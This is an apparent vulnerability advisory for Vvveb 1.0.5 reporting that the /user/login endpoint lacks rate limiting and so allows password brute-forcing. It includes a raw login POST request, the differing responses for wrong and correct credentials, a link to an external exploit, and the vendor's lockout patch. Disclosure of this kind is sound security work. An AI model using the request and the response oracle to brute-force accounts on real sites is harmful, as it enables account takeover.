Vvveb 1.0.5 | User account bruteforce
Basic Information
| Software Type | Web App |
|---|---|
| Software Name | Vvveb |
| Affected Version | 1.0.5 |
| Software Vendor | Vvveb |
| Software Link | https://github.com/givanz/Vvveb |
| Severity | Medium |
| CVSS Score | 6.3 |
| Affected Assets | 100+ |
| Date of Discovery | Jan 3rd, 2025 |
Description
The user login endpoint located at /user/login is vulnerable to bruteforce because there is no rate limiting protection.
Reproduce
To reproduce the issue, register an account for testing at /user/signup and then use your email and password to sign in.
Submit a correct email with an incorrect email:
POST /user/login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------26162393051061393382488967706
Content-Length: 548
Referer: http://127.0.0.1/user/login
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Connection: keep-alive
Cookie: _ga_90PNJH7CQ5=GS1.1.1735826854.1.1.1735826858.0.0.0; _ga=GA1.1.305814098.1735826855; PHPSESSID=EzuO8BB8K7BLfydEIx%2C1De1mJA3ONYvZBOIhjeXt-syZFn0%2C
Priority: u=0, i
-----------------------------26162393051061393382488967706
Content-Disposition: form-data; name="csrf"
9viWf6BOwWSbYYxl
-----------------------------26162393051061393382488967706
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------26162393051061393382488967706
Content-Disposition: form-data; name="password"
redshark1231
-----------------------------26162393051061393382488967706
Content-Disposition: form-data; name="redirect"
-----------------------------26162393051061393382488967706--
As a result, you get the following response:
Authentication failed, wrong email or password!
For a correct set of credentials, you get redirected to /user and following the direction, you get the following response:
This is your user dashboard
With this in mind, we can craft an exploit to perform password bruteforce, here is my exploit:
https://gist.github.com/0xHamy/30a305e01e97a02ada381439237b04b5
Proof of Concept (PoC) Video
PoC Exploit
https://gist.github.com/0xHamy/30a305e01e97a02ada381439237b04b5
Mitigation
Add rate limiting and captcha.
Patch
Vvveb added a failed logins table with an hourly count of failed attempts, the account is locked after 10 attempts for the current hour.
Posted on: January 10, 2025 09:25 PM